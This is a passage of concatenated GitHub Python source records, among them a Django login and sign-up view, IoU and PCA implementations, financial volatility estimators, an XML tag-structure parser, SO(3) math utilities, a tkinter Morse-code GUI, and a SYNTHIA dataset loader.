here.\ndef index(request):\n\treturn render(\n\t\trequest,\n\t\t'index.html'\n\t)\n\ndef singup_done(request):\n\treturn render(\n\t\trequest,\n\t\t'singup_done.html'\n\t)\n\ndef error(request):\n\treturn render(\n\t\trequest,\n\t\t'error.html'\n\t)\n\ndef singin(request):\n\tif request.method == 'POST':\n\t\tform = LoginForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tcd = form.cleaned_data\n\t\t\tuser = authenticate(email=cd['email'], password=cd['password'])\n\t\t\tif user is not None:\n\t\t\t\tif user.is_active:\n\t\t\t\t\tlogin(request, user)\n\t\t\t\t\treturn redirect('controlPanel')\n\t\t\t\telse:\n\t\t\t\t\treturn redirect('error')\n\t\t\telse:\n\t\t\t \tmessages.error(request, 'Неверное имя пользователя или пароль')\n\t\t\t \treturn render(request, 'singin.html', {'form': form})\n\telse:\n\t\tform = LoginForm()\n\n\treturn render(request, 'singin.html', {'form': form})\n\ndef singup(request):\n\tif request.method == 'POST':\n\t\tuser_form = CustomUserCreationForm(request.POST)\n\t\tif user_form.is_valid():\n\t\t\tnew_user = user_form.save(commit=False)\n\t\t\tnew_user.set_password(user_form.cleaned_data['password'])\n\t\t\tnew_user.save()\n\t\t\treturn 
redirect('singup_done')\n\telse:\n\t\tuser_form = CustomUserCreationForm()\n\n\treturn render(request,'singup.html',{'user_form': user_form})\n\n@login_required\ndef control_panel(request):\n\tcur_user = request.user\n\n\tids = []\n\n\tfor i in range(10):\n\t\tids.append(i)\n\n\n\tcontext = {\n\t\t'cur_user':cur_user,\n\t\t'ids': ids,\n\n\t}\n\treturn render(request, 'controlPanel.html', context=context)\n\n\n\t","repo_name":"ortlaz/IoT_cloud_project","sub_path":"cloud_project/cloud_project/telemetry/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"8915498775","text":"def iou(box1, box2):\n    \"\"\"\n\n    Arguments:\n    box1 -- first box, list object with coordinates (x1, y1, x2, y2)\n    box2 -- second box, list object with coordinates (x1, y1, x2, y2)\n    \"\"\"\n\n    # Calculate the (x1, y1, x2, y2) coordinates of the intersection of box1 and box2. \n    \n    xi1 = max(box1[0], box2[0])\n    yi1 = max(box1[1], box2[1])\n    xi2 = min(box1[2], box2[2])\n    yi2 = min(box1[3], box2[3])\n    # clamp at zero so non-overlapping boxes give zero intersection\n    inter_area = max(xi2 - xi1, 0) * max(yi2 - yi1, 0)\n    \n\n    # Calculating the Union area by using Formula: Union(A,B) = A + B - Inter(A,B)\n    \n    box1_area = (box1[2] - box1[0]) * (box1[3] - box1[1])\n    box2_area = (box2[2] - box2[0]) * (box2[3] - box2[1])\n    union_area = box1_area + box2_area - inter_area\n\n    # compute the IoU\n    iou = inter_area / union_area\n\n    return iou\n","repo_name":"ArvindSubramaniam/Yolo-object-Detection","sub_path":"IOU.py","file_name":"IOU.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"20613848701","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\n\nclass myPCA:\n    \n    def __init__(self, n_components):\n        self.fitted=False\n        self.n_components = n_components\n        self.trans= []\n        self.variance_ratio = []\n        self.variance = []\n    def fit(self,x):\n        Mean = np.mean(x,axis=0)\n        Variance = np.cov(x.T)\n\n        vals, vecs = np.linalg.eig(Variance)\n        sum_values = np.sum(vals)\n        var_ratios = vals/sum_values\n        y = vecs.T.dot(x.T)\n        yt = y.T\n\n        for i in range(yt.shape[0]):\n            for j in range(yt.shape[1]):\n                if(j%2!=0):\n                    yt[i][j] = -yt[i][j]\n        self.fitted=True\n        self.trans=yt\n        self.variance_ratio = var_ratios\n        self.variance_ratio = self.variance_ratio[:self.n_components]\n        self.variance = vals\n        self.variance = self.variance[:self.n_components]\n    def transform(self):\n        if not self.fitted:\n            print(\"Data not fitted\")\n            return None\n        li = [i for i in range(self.n_components)]\n        return (self.trans[:,li])\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"SiddhantSinha19/PCA","sub_path":"pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"71172295309","text":"import numpy as np\n\ndef standard_dev(df):\n    close_ = df['Close'].values\n    return np.std(close_)\n\ndef close_to_close(df):\n    close_ = df['Close'].values\n    returns = close_[1:] / close_[:-1]\n    log_returns = np.log(returns)\n    ctc = np.sqrt(np.mean(log_returns**2))\n    return ctc\n\ndef parkinson(df):\n    open_ = df['Open'].values\n    high_ = df['High'].values\n    low_ = df['Low'].values\n    close_ = df['Close'].values\n    pk = np.sqrt(1 / (4*np.log(2)) * np.mean(np.log(high_/low_)**2))\n    return pk\n\ndef garman_klass(df):\n    open_ = df['Open'].values\n    high_ = df['High'].values\n    low_ 
= df['Low'].values\n close_ = df['Close'].values\n\n f1 = np.mean(0.5*np.log(high_/low_)**2)\n f2 = np.mean((2*np.log(2)-1)*np.log(close_/open_)**2)\n gk = np.sqrt(f1-f2)\n return gk\n\ndef rogers_satchell(df):\n open_ = df['Open'].values\n high_ = df['High'].values\n low_ = df['Low'].values\n close_ = df['Close'].values\n vol = np.sqrt(np.mean(np.log(high_/close_)*np.log(high_/open_)+np.log(low_/close_)*np.log(low_/open_)))\n return vol\n\ndef garman_klass_yang_zhang(df):\n open_ = df['Open'].values[1:]\n high_ = df['High'].values[1:]\n low_ = df['Low'].values[1:]\n close_ = df['Close'].values[1:]\n prev_close = df['Close'].shift().values[1:]\n\n f1 = np.mean(np.log(open_/prev_close)**2)\n f2 = np.mean(0.5*np.log(high_/low_)**2)\n f3 = np.mean((2*np.log(2)-1)*(np.log(close_/open_)**2))\n vola = np.sqrt(f1+f2-f3)\n return vola\n\ndef yang_zhang(df):\n open_ = df['Open'].values[1:]\n high_ = df['High'].values[1:]\n low_ = df['Low'].values[1:]\n close_ = df['Close'].values[1:]\n prev_close = df['Close'].shift().values[1:]\n\n alpha = 1.34 # Suggested value in original Yang Zhang paper\n T = len(open_)\n k = (alpha-1) / (alpha + (T+1)/(T-1))\n\n rs = rogers_satchell(df)\n overnight = np.sum(np.power(np.log(open_/prev_close)-np.mean(np.log(open_/prev_close)), 2)) / (T-1)\n open_close = np.sum(np.power(np.log(close_/open_)-np.mean(np.log(close_/open_)), 2)) / (T-1)\n yz = np.sqrt( overnight + k*open_close + (1-k)*np.power(rs, 2))\n return yz\n","repo_name":"fco-jle/MachineTrading","sub_path":"time_series_analysis/volatility.py","file_name":"volatility.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"70022821387","text":"\"\"\"\nYou want to create your local database containing information about the things you find the coolest. You used to store this information\nin xml documents, so now you need to come up with an algorithm that will convert the existing format into the new one. First you\ndecided to choose a structure for your scheme, and to do it you want to represent xml document as a tree, i.e. gather all the tags and\nprint them out as follows:\n\n tag1()\n --tag1.1(attribute1, attribute2, ...)\n ----tag1.1.1(attribute1, attribute2, ...)\n ----tag1.1.2(attribute1, attribute2, ...)\n --tag1.2(attribute1, attribute2, ...)\n ----tag1.2.1(attribute1, attribute2, ...)\n ...\nwhere attributes of each tag are sorted lexicographically.\n\nYou are a careful person, so the structure of the xml is neatly organized is such a way that:\n\n there is a single tag at the root level;\n each tag has a single parent tag (i.e. if there are several occurrences of tag a, and in one occurrence it's a child of tag b and in\n the other one it's a child of tag c, then b = c);\n each appearance of the same tag belongs to the same level.\n \nGiven an xml file, return its structure as shown above. 
The tags of the same level should be sorted in the order they appear in xml, and\nthe attributes should be sorted lexicographically.\n\"\"\"\nfrom collections import OrderedDict\nimport xml.etree.ElementTree as ET\n\ndef depthIter(element):\n    stack = []\n    stack.append(iter(element))\n    yield (element, 0)\n    while stack:\n        currentElement = next(stack[-1], None)\n        if currentElement is None:\n            stack.pop()\n        else:\n            yield (currentElement, len(stack))\n            stack.append(iter(currentElement))\n\n\ndef xmlTags(xml):\n    result = []\n    tags = OrderedDict()\n    root = ET.fromstring(xml)\n    for element, depth in depthIter(root):\n        if element.tag not in tags:\n            tags[element.tag] = [depth, set(element.keys())]\n        else :\n            tags[element.tag][1] |= set(element.keys())\n\n    for tag, value in tags.items():\n        properties = ', '.join(sorted(value[1]))\n        result.append('--'*value[0]+tag+'('+properties+')')\n    return result\n","repo_name":"bavalpey/codefights","sub_path":"python/picturingTheParsibilities/xmlTags.py","file_name":"xmlTags.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"82"} +{"seq_id":"40943042364","text":"import json\nimport re\nimport xml.etree.ElementTree as ET\n\n\ncontext = ET.iterparse(r'data/Posts.xml', events=('end', ))\nso_data = []\n\nwith open('data/all_tags.json', 'r') as t:\n    tags = json.load(t)\nnum = 0\nnum2 = 0\nindex = 1\ntry:\n    for event, elem in context:\n        if re.match('2019', elem.get('CreationDate')):\n            break\n        if re.match('2017|2018', elem.get('CreationDate')) and elem.get('PostTypeId') == '2':\n            text = elem.get('Body')\n            text = re.sub('<.*?>', '', text)\n            text = re.sub('\\n+', '', text)\n            so_data.append({'Score': elem.get('Score'), 'Body': text, 'Tags': tags[elem.get('ParentId')]})\n            num += 1\n            if num % 1000 == 0:\n                print(elem.get('CreationDate'))\n            if num % 10000 == 0:\n                with open('posts2018/so_posts_2017_18_{}.json'.format(index), 'w') as com:\n                    json.dump(so_data, com)\n                index += 1\n                so_data = []\n        else:\n            num2 += 1\n            if num2 % 100 == 0:\n                print('100')\nexcept Exception:\n    pass\n\nwith open('posts2018/so_posts_2017_18_last.json', 'w') as com:\n    json.dump(so_data, com)\n","repo_name":"tierin/toxicso","sub_path":"save_year_posts.py","file_name":"save_year_posts.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"31865217549","text":"# Author(s): Justice Mason\n# Project: DEVS/RODEN \n# Package: Math Utilities\n# Date: 12/17/21\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\n\nfrom models.lie_tools import log_map, map_to_lie_algebra\nfrom utils.physics_utils import rk4_step\n\ndef distance_so3(R1: torch.Tensor, R2: torch.Tensor) -> torch.Tensor:\n    \"\"\"\n    Distance function for SO(3).\n    \n    ...\n    \n    Parameters\n    ----------\n    R1\n    R2\n    \n    Returns\n    -------\n    distance\n    \n    Notes\n    -----\n    \n    \"\"\"\n    product = torch.einsum('bij, bkj -> bik', R2, R1)\n    trace = torch.einsum('bii', product)\n    \n    dist = 0.5 * (trace - 1)\n    eps = 1e-2\n    \n    dist_ = dist.clamp(min=-1+eps, max=1-eps)\n    distance = torch.acos(dist_)\n    \n    return distance\n\ndef torch_matrix_power(X: torch.Tensor, n) -> torch.Tensor:\n    \"\"\"\n    Function to calculate the matrix power.\n    \n    ...\n    \n    Parameters\n    ----------\n    X : torch.Tensor\n        Input matrix of shape (bs, n, n).\n    \n    n: float or int\n        Power to raise matrix.\n    \n    Returns\n    -------\n    Xn : torch.Tensor\n        Matrix raised to power n.\n    \n    Notes\n    -----\n    \n    \"\"\"\n    evals, evecs = 
torch.linalg.eig(X) # get eigendecomposition\n    evals = evals.real # get real part of (real) eigenvalues\n    evecs = evecs.real\n    \n    evpow = evals**n # raise eigenvalues to fractional power\n    Xn = torch.matmul(evecs, torch.matmul(torch.diag_embed(evpow), torch.linalg.inv(evecs)))\n    \n    return Xn\n\ndef project_so3(R: torch.Tensor):\n    \"\"\"\n    Function that projects R^{3 \\times 3} on to SO(3).\n    \n    ...\n    \n    \"\"\"\n    assert torch.any(R.isnan()) == False and torch.any(R.isinf()) == False\n    \n    prod = torch.bmm(R, R.permute(0, 2, 1))\n    # polar decomposition: the orthogonal factor is (R R^T)^{-1/2} R\n    C = torch.bmm(torch_matrix_power(X=prod, n=-0.5), R)\n    \n    return C\n\ndef quat_omega(w: torch.Tensor) -> torch.Tensor:\n    \"\"\"\n    Function to generate the \\Omega(\\omega) matrix in the kinematic differential equations for quaternions.\n    \n    ...\n    \n    Parameters\n    ----------\n    w : torch.Tensor\n        Angular velocity\n    \n    Returns\n    -------\n    Q : torch.Tensor\n        Matrix for KDEs of quaternions\n    \n    Notes\n    -----\n    Q = \\Omega(w) = [[-S(w), w], [-w^{T}, 0]] \\in su(2)\n    \n    \"\"\"\n    bs, _ = w.shape\n    S_w = map_to_lie_algebra(v=w)\n    \n    Q = torch.zeros((bs, 4, 4), device=w.device)\n    Q[:, :3, :3] = -S_w\n    Q[:, -1, :3] = -w\n    Q[:, :3, -1] = w\n    \n    return Q\n    \ndef pd_matrix(diag: torch.Tensor, off_diag: torch.Tensor) -> torch.Tensor:\n    \"\"\"\n    Function constructing positive-definite matrix from diag/off-diag entries.\n    \n    ...\n    \n    Parameters\n    ----------\n    diag : torch.Tensor\n        Diagonal elements of PD matrix.\n    \n    off-diag: torch.Tensor\n        Off-diagonal elements of PD matrix.\n    \n    Returns\n    -------\n    matrix_pd : torch.Tensor\n        Calculated PD matrix.\n    \n    Notes\n    -----\n    \n    \"\"\"\n    diag_dim = diag.shape[0]\n    \n    L = torch.diag_embed(diag)\n    ind = np.tril_indices(diag_dim, k=-1)\n    flat_ind = np.ravel_multi_index(ind, (diag_dim, diag_dim))\n    \n    L = torch.flatten(L, start_dim=0)\n    L[flat_ind] = off_diag\n    L = torch.reshape(L, (diag_dim, diag_dim))\n    \n    matrix_pd = L @ L.T + (1 * torch.eye(diag_dim, device=diag.device))\n    \n    return matrix_pd\n\ndef symmetric_matrix(diag: np.ndarray, off_diag: np.ndarray) -> np.ndarray:\n    \"\"\"\n    Function to make symmetric matrix from diagonal and off-diagonal elements.\n    \n    ...\n    \n    Parameters\n    ----------\n    diag : np.ndarray\n        Diagonal entries\n    \n    off_diag : np.ndarray\n        Off-diagonal entries\n    \n    Returns\n    -------\n    sym_matrix : np.ndarray\n        Symmetric matrix\n    Notes\n    -----\n    \n    \"\"\"\n    lt_id = np.tril_indices(3, k=-1)\n    ut_id = np.triu_indices(3, k=1)\n    A = np.zeros((3,3))\n    \n    A[ut_id] = off_diag\n    A[lt_id] = off_diag\n    \n    sym_matrix = A + np.diag(diag)\n    return sym_matrix\n\ndef sample_points_on_sphere(radius: float, theta_arr: np.ndarray, phi_arr: np.ndarray) -> np.ndarray:\n    \"\"\"\n    Function to sample points on sphere given radius and angles \\phi and \\theta.\n    \n    ...\n    \n    Parameters\n    ----------\n    radius : float\n        Radius of desired sphere.\n    \n    theta_arr : np.ndarray\n        Array of theta values to be sampled on given sphere.\n    \n    phi_arr : np.ndarray\n        Array of phi values to be sampled on given sphere.\n    \n    Returns\n    -------\n    samples : np.ndarray\n        Array of sampled points from given sphere.\n    \n    Notes\n    -----\n    Using (r, \\theta, \\phi) \\rightarrow (x, y, z) convention.\n    \n    \"\"\"\n    \n    cos = np.cos\n    sin = np.sin\n    r = radius\n    \n    assert r > 0.0, \"sphere's radius must be positive and greater than zero.\"\n    \n    x = r * np.multiply(sin(phi_arr), cos(theta_arr))\n    y = r * np.multiply(sin(phi_arr), sin(theta_arr))\n    z = r * cos(phi_arr) # cos(phi) so that x**2 + y**2 + z**2 == r**2\n    \n    assert (y.shape == z.shape and x.shape == y.shape), \"XYZ coordinate shapes are not matching.\"\n    \n    
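# Stack the per-axis coordinate arrays into a single array of sampled points.\n    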
samples = np.concatenate((x, y, z), axis=0)\n    return samples\n\ndef rotate(img, theta):\n    \"\"\"\n    Rotation function used in equivariance loss from Falorsi et al., 2018.\n    \n    ...\n    \n    \"\"\"\n    cos = torch.cos(theta)\n    sin = torch.sin(theta)\n    zero = torch.zeros_like(theta)\n    affine = torch.stack([cos, -sin, zero, sin, cos, zero], 1).view(-1, 2, 3)\n    grid = F.affine_grid(affine, img.size(), align_corners=True)\n    return F.grid_sample(img, grid, align_corners=True)\n","repo_name":"jjmason687/LearningSO3fromImages","sub_path":"utils/math_utils.py","file_name":"math_utils.py","file_ext":"py","file_size_in_byte":5609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"20677631463","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import *\nimport tkinter.font as font\nfrom PIL import Image, ImageTk\n\n# this is the function called when the button is clicked\nimport TxtDecry\nimport TxtEncry\nimport HiddenInTxt\nimport ExtractFromText\nimport DataHideInImage\nimport DataExtractFromImage\n\n# function for Initializing\ndef btnInitial():\n    import Morse1\n    import Morse2\n    import Messages\n\n\n# function for Text Encryption\ndef btnTxtEncry():\n    TxtEncry.main1()\n\n\n# Function for text decryption\ndef btnTxtDecry():\n    TxtDecry.main1()\n\n\n# Function for data hiding in text\ndef btnDataTxt():\n    HiddenInTxt.main1()\n\n\n# function for data extraction from text\ndef btnDataExt():\n    ExtractFromText.main1()\n\n\n# function for data hiding in image\ndef btnImgHide():\n    DataHideInImage.main1()\n\ndef btnImgExtr():\n    DataExtractFromImage.main1()\n\nroot = Tk()\n\n# This is the section of code which creates the main window\nroot.geometry('800x650')\nroot.configure(background='#001533')\nroot.title('Encryptor')\n\n# --------Fonts---------\n\nmfont = font.Font(family=\"Fixedsys\",\n                  size=\"40\",\n                  weight=\"bold\")\n\n# Name of the Program\nLabel(root, text='Morse Code Encryptor', fg=\"#F01154\", bg='#001533', font=mfont).place(x=85, y=24)\n\n# gratitude\nLabel(root, text='Thanks for using the Machine', bg='#001533', fg=\"#04f8f8\", font=('helvetica', 12, 'bold')).place(\n    x=270, y=100)\n\n# Initializing button\nButton(root, text='Initialize the Machine', fg=\"#000000\",\n       bg='#DB4D61',\n       font=('verdana', 16, 'normal'),\n       borderwidth=0,\n       activebackground=\"#DB4D61\", command=btnInitial).place(\n    x=270, y=140)\n\n# Menu label\nLabel(root, text='Process Menu', fg=\"#04f8f8\", bg='#001533', font=('helvetica', 18, 'normal')).place(x=100, y=198)\n\n#By TEAM 47 label\nLabel(root, text='By TEAM 47', fg=\"#04f8f8\", bg='#001533', font=('FIXEDSYS', 14, 'normal')).place(x=600, y=90)\n\n# Data encryption in text button\n# To use an image button instead: btn = PhotoImage(file=\"./button_encryption-of-text.png\") and pass image=btn after bg\n\nButton(root,text=\"1.Encryption of Text \",\n       fg=\"#000000\",\n       bg='#1AD5FF',\n       font=('segoe ui', 16, 'normal'),\n       borderwidth=0,\n       activebackground=\"#DB4D61\", command=btnTxtEncry).place(x=100, y=244)\n\n# Data decryption in text button\nButton(root, text='2.Decryption of Morse Code ', fg=\"#000000\",\n       bg='#1AD5FF',\n       font=('segoe ui', 16, 'normal'),\n       borderwidth=0,\n       activebackground=\"#DB4D61\", command=btnTxtDecry).place(x=100, y=306)\n\n# Data hiding in text button\nButton(root, text='3.Data Hiding in Text ', fg=\"#000000\",\n       bg='#1AD5FF',\n       font=('segoe ui', 16, 'normal'),\n       borderwidth=0,\n       activebackground=\"#DB4D61\", command=btnDataTxt).place(x=100, y=367)\n\n# Data extraction from text 
button\nButton(root, text='4.Data Extraction from Text ',\n fg=\"#000000\",\n bg='#1AD5FF',\n font=('segoe ui', 16, 'normal'),\n borderwidth=0,\n activebackground=\"#DB4D61\", command=btnDataExt).place(\n x=100, y=431)\n\n# Data hiding in image button\nButton(root, text='5.Data Hiding in Image ',\n fg=\"#000000\",\n bg='#1AD5FF',\n font=('segoe ui', 16, 'normal'),\n borderwidth=0,\n activebackground=\"#DB4D61\",\n command=btnImgHide).place(x=100, y=490)\n\n# Data Extracting from image button\nButton(root, text='6.Data Extracting from Image',\n fg=\"#000000\",\n bg='#1AD5FF',\n font=('segoe ui', 16, 'normal'),\n borderwidth=0,\n activebackground=\"#DB4D61\",\n command=btnImgExtr).place(x=100, y=550)\n\n# exit button\nexit_button = Button(root, text=\"EXIT\", fg=\"#001533\",\n activeforeground='#04f8f8',\n activebackground='#001533',\n borderwidth=0,\n bg='#04f8f8', font=('verdana', 16, 'normal'),\n command=root.destroy)\nexit_button.place(x=700, y=595)\n\n#-------LOGO-------\nframe = Frame(root, width=250, height=250,bd=0,bg=\"#001533\")\nframe.pack()\nframe.place(x=470,y=240)\n\n# Create an object of tkinter ImageTk\nimg = ImageTk.PhotoImage(Image.open(\"1.png\"))\n\n# Create a Label Widget to display the text or Image\nlabel = Label(frame, image = img,bd=0)\nlabel.pack()\n\n\nroot.mainloop()\n","repo_name":"Ved987/Morse-Code-Encryptor-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"24455292615","text":"import sys\n\ndef main():\n print(search_file_in_dir())\n\ndef search_file_in_dir():\n try:\n filename = get_correct_filename(sys.argv)\n return read_file(filename)\n except FileNotFoundError:\n print(\"File does not exist\")\n sys.exit(1)\n\n\ndef read_file(filename):\n with open(filename, 'r') as file:\n lines = file.readlines()\n code_lines = 0\n for line in lines:\n if line.strip() and not line.strip().startswith('#'):\n code_lines += 1\n return code_lines\n\n\ndef get_correct_filename(argv):\n if len(argv) < 2:\n print(\"Too few command-line arguments\")\n sys.exit(1)\n elif len(argv) > 2:\n print(\"Too many command-line arguments\")\n sys.exit(1)\n else:\n filename = argv[1].lower().lstrip()\n if not filename.endswith(\".py\"):\n print(\"Not a python file\")\n sys.exit(1)\n else:\n return filename\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MrsMystique/python-repo","sub_path":"PythonCS50P/all tasks cs50P/lines.py","file_name":"lines.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"74442022027","text":"import numpy as np\nfrom os import listdir, path, makedirs, environ\nfrom tqdm import tqdm\nimport tarfile\nimport cv2\nimport shutil\nimport json\nfrom sklearn.model_selection import train_test_split\nfrom copy import deepcopy\n\nfrom .data_baseclass import DataBaseclass\nfrom .augmentation import augmentate\nfrom .synthia import SYNTHIA_BASEPATH, \\\n one_channel_image_reader\n\n\n# Set label information according to synthia README\nLABELINFO = {\n 0: {'name': 'void', 'color': [0, 0, 0]},\n 1: {'name': 'sky', 'color': [128, 128, 128]},\n 2: {'name': 'building', 'color': [128, 0, 0]},\n 3: {'name': 'road', 'color': [128, 64, 128]},\n 4: {'name': 'sidewalk', 'color': [0, 0, 192]},\n 5: {'name': 'fence', 'color': [64, 64, 128]},\n 6: {'name': 'vegetation', 'color': [128, 128, 0]},\n 7: {'name': 'pole', 'color': [192, 192, 
128]},\n 8: {'name': 'car', 'color': [64, 0, 128]},\n 9: {'name': 'traffic sign', 'color': [192, 128, 128]},\n 10: {'name': 'pedestrian', 'color': [64, 64, 0]},\n 11: {'name': 'bicycle', 'color': [0, 128, 192]}\n}\n\n\nclass SynthiaCityscapes(DataBaseclass):\n \"\"\"Driver for SYNTHIA dataset (http://synthia-dataset.net/).\"\"\"\n\n _data_shape_description = {\n 'rgb': (None, None, 3), 'depth': (None, None, 1), 'labels': (None, None)}\n _num_default_classes = 12\n\n def __init__(self, base_path=SYNTHIA_BASEPATH, force_preprocessing=False,\n batchsize=1, resize=False, in_memory=False, **data_config):\n\n config = {\n 'augmentation': {\n 'crop': [1, 240],\n 'scale': [.4, 0.7, 1.5],\n 'vflip': .3,\n 'hflip': False,\n 'gamma': [.4, 0.3, 1.2],\n 'rotate': [.4, -13, 13],\n 'shear': [0, 0.01, 0.03],\n 'contrast': [.3, 0.5, 1.5],\n 'brightness': [.2, -40, 40]\n },\n 'labels': {\n 'lanemarkings': False\n }\n }\n config.update(data_config)\n config.update({'resize': resize})\n self.config = config\n\n if not path.exists(base_path):\n message = 'ERROR: Path to SYNTHIA dataset does not exist.'\n print(message)\n raise IOError(1, message, base_path)\n\n self.basepath = path.join(base_path, 'RAND_CITYSCAPES')\n\n # Every sequence got their own train/test split during preprocessing. According\n # to the loaded sequences, we now collect all files from all sequence-subsets\n # into one list.\n if in_memory and 'TMPDIR' in environ:\n print('INFO loading dataset into memory')\n # first load the tarfile into a closer memory location, then load all the\n # images\n tar = tarfile.open(path.join(SYNTHIA_BASEPATH, 'RAND_CITYSCAPES.tar.gz'))\n localtmp = environ['TMPDIR']\n tar.extractall(path=localtmp)\n tar.close()\n self.basepath = localtmp\n with open(path.join(self.basepath, 'train_test_split.json'), 'r') as f:\n split = json.load(f)\n trainset = [{'image': self._load_data(filename)}\n for filename in tqdm(split['trainset'])]\n testset = [{'image': self._load_data(filename)}\n for filename in tqdm(split['testset'])]\n else:\n if in_memory:\n print('INFO Environment Variable TMPDIR not set, could not unpack data '\n 'and load into memory\\n'\n 'Now trying to load every image seperately')\n with open(path.join(self.basepath, 'train_test_split.json'), 'r') as f:\n split = json.load(f)\n trainset = [{'image_name': filename} for filename in split['trainset']]\n testset = [{'image_name': filename} for filename in split['testset']]\n\n measureset, testset = train_test_split(testset, test_size=0.5, random_state=1)\n\n # Update labelinfo according to config\n labelinfo = deepcopy(LABELINFO)\n if self.config['labels']['lanemarkings']:\n labelinfo[12] = {'name': 'lanemarking', 'color': [0, 192, 0]}\n\n # Intitialize Baseclass\n DataBaseclass.__init__(self, trainset, measureset, testset, labelinfo)\n\n @property\n def one_hot_lookup(self):\n return np.arange(len(self.labelinfo), dtype=np.int)\n\n def _preprocessing(self, sequence):\n rootpath = path.join(self.basepath, sequence, 'GT')\n\n for direction in ['F', 'B', 'L', 'R']:\n inpath, outpath = (path.join(rootpath, pref,\n 'Stereo_Right/Omni_{}'.format(direction))\n for pref in ['LABELS', 'LABELS_NPY'])\n\n if path.exists(outpath):\n shutil.rmtree(outpath)\n makedirs(outpath)\n for filename in tqdm(listdir(inpath)):\n array = one_channel_image_reader(path.join(inpath, filename),\n np.uint8)\n np.save(path.join(outpath, filename.split('.')[0]), array)\n\n if sequence == 'RAND_CITYSCAPES':\n # There are no different directions for this sequence.\n break\n\n # create 
train-test-split if necessary\n        if not path.exists(path.join(self.basepath, sequence, 'train_test_split.json')):\n            print(\"INFO: Creating Train-Test-Split\")\n            filenames = [filename.split('.')[0] for filename\n                         in listdir(path.join(rootpath, 'LABELS/Stereo_Right/Omni_F'))]\n            trainset, testset = train_test_split(filenames, test_size=0.2)\n            with open(path.join(self.basepath, sequence, 'train_test_split.json'),\n                      'w') as f:\n                json.dump({'trainset': trainset, 'testset': testset}, f)\n\n    def _load_data(self, image_name):\n        filetype = {'rgb': 'png', 'depth': 'png', 'labels': 'npy'}\n\n        rgb_filename, depth_filename, groundtruth_filename = (\n            path.join(self.basepath, '{}/Stereo_Right/Omni_F/{}.{}'\n                      .format(pref, image_name, filetype[modality]))\n            for pref, modality in zip(['RGB', 'Depth', 'GT/LABELS_NPY'],\n                                      ['rgb', 'depth', 'labels']))\n\n        blob = {}\n        blob['rgb'] = cv2.imread(rgb_filename)\n        # flag 2 -> read image with 16bit depth\n        blob['depth'] = cv2.imread(depth_filename, 2)\n        labels = np.load(groundtruth_filename)\n        # Dirty fix for the class mappings as in adapnet paper\n        labels[labels == 12] = 11 # motorcycle -> bicycle\n        labels[labels == 13] = 12 # parking spot -> lanemarking\n        labels[labels == 14] = 0 # road_work -> void\n        labels[labels == 15] = 0 # traffic light -> void\n        labels[labels == 16] = 0 # terrain -> void\n        labels[labels == 17] = 11 # rider -> bicycle\n        labels[labels == 18] = 8 # truck -> car\n        labels[labels == 19] = 8 # bus -> car\n        labels[labels == 20] = 0 # train -> void\n        labels[labels == 21] = 0 # wall -> void\n        labels[labels == 22] = 12 # lanemarking\n\n        if not self.config['labels']['lanemarkings']:\n            labels[labels == 12] = 0 # lanemarking -> void\n\n        blob['labels'] = labels\n\n        if self.config['resize']:\n            blob['rgb'] = cv2.resize(blob['rgb'], (768, 384),\n                                     interpolation=cv2.INTER_LINEAR)\n            for m in ['depth', 'labels']:\n                blob[m] = cv2.resize(blob[m], (768, 384),\n                                     interpolation=cv2.INTER_NEAREST)\n        return blob\n\n    def _get_data(self, image_name=False, image=False, training_format=True):\n        \"\"\"Returns data for one given image number from the specified sequence.\"\"\"\n        if not image_name and not image:\n            # one of the two should be specified\n            assert False\n        if image_name:\n            blob = self._load_data(image_name)\n        if image:\n            blob = {}\n            for m in image:\n                blob[m] = image[m].copy()\n\n        if training_format:\n            blob = augmentate(blob,\n                              scale=self.config['augmentation']['scale'],\n                              crop=self.config['augmentation']['crop'],\n                              hflip=self.config['augmentation']['hflip'],\n                              vflip=self.config['augmentation']['vflip'],\n                              gamma=self.config['augmentation']['gamma'],\n                              contrast=self.config['augmentation']['contrast'],\n                              brightness=self.config['augmentation']['brightness'],\n                              rotate=self.config['augmentation']['rotate'],\n                              shear=self.config['augmentation']['shear'])\n\n            # Format labels into one-hot\n            blob['labels'] = np.array(self.one_hot_lookup ==\n                                      blob['labels'][:, :, None]).astype(int)\n\n        # We have to add a dimension for the channels, as there is only one and the\n        # dimension is omitted.\n        blob['depth'] = np.expand_dims(blob['depth'], 3)\n\n        # Force the image dimension to be multiple of 16\n        h, w, _ = blob['rgb'].shape\n        h_c, w_c = [d - (d % 16) for d in [h, w]]\n        if h_c != h or w_c != w:\n            for m in ['rgb', 'depth', 'labels']:\n                blob[m] = blob[m][:h_c, :w_c, ...]\n\n        return 
